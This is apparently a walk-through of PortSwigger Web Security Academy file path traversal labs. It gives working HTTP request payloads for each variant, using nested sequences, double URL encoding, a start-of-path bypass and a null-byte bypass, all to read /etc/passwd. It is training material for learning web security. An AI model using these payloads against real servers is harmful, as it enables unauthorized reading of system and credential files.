Walk-through of the Directory traversal (or File Path Traversal) lab on PortSwigger Web Security Academy. Directory traversal is a web security vulnerability that allows an attacker to read arbitrary files on the server that is running an application.
- Apprentice – File path traversal, simple case
- Practitioner – File path traversal, traversal sequences blocked with absolute path bypass
- Practitioner – File path traversal, traversal sequences stripped non-recursively
- Practitioner – File path traversal, traversal sequences stripped with superfluous URL-decode
- Practitioner – File path traversal, validation of start of path
- Practitioner – File path traversal, validation of file extension with null byte bypass
Apprentice – File path traversal, simple case
💡 In the Proxy->HTTP history tab, REMOVE filter on MIME Type for images.
Inspect requests using Burp Suite.
GET /image?filename=5.jpg HTTP/1.1Directory traversal to read /etc/passwd
GET /image?filename=../../../../../etc/passwd HTTP/1.1Practitioner – File path traversal, traversal sequences blocked with absolute path bypass
GET /image?filename=/etc/passwd HTTP/1.1Practitioner – File path traversal, traversal sequences stripped non-recursively
You might be able to use nested traversal sequences, such as ….// or ….\/, which will revert to simple traversal sequences when the inner sequence is stripped.
GET /image?filename=....//....//....//....//....//etc//passwd HTTP/1.1Practitioner – File path traversal, traversal sequences stripped with superfluous URL-decode
In some contexts, such as in a URL path or the filename parameter of a multipart/form-data request, web servers may strip any directory traversal sequences before passing your input to the application. You can sometimes bypass this kind of sanitization by URL encoding, or even double URL encoding, the ../ characters, resulting in %2e%2e%2f or %252e%252e%252f respectively. Various non-standard encodings, such as ..%c0%af or ..%ef%bc%8f, may also do the trick.
Send the initial request to the Intruder module. Set the payload marker (varying part) to the filename parameter value.
GET /image?filename=§5.jpg§ HTTP/1.1Try double encoding for ../ with %252e%252e%252f.
GET /image?filename=%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd HTTP/1.1It works. Another option is to use the Intruder and a list. In the payloads, choose Add from list… and select Fuzzing – path traversal. Start the attack. Order results by HTTP status code. One request returning HTTP 200 OK will appear (in addition to the original baseline request). Send the request to the Repeater and change /etc/hosts by /etc/passwd like this:
GET /image?filename=%2e%252e%252f%2e%252e%252f%2e%252e%252f%2e%252e%252f%2e%252e%252f%2e%252e%252f%2e%252e%252f%2e%252e%252f%2e%252e%252f%2e%252e%252f%2e%252e%252f%2e%252e%252fetc%2fpasswd HTTP/1.1Practitioner – File path traversal, validation of start of path
Inspect requests using Burp Suite.
GET /image?filename=/var/www/images/21.jpg HTTP/1.1Directory traversal to read /etc/passwd
GET /image?filename=/var/www/images/../../../etc/passwd HTTP/1.1Practitioner – File path traversal, validation of file extension with null byte bypass
Inspect requests using Burp Suite.
GET /image?filename=5.jpg HTTP/1.1Directory traversal to read /etc/passwd
GET /image?filename=../../../etc/passwd%00.jpg HTTP/1.1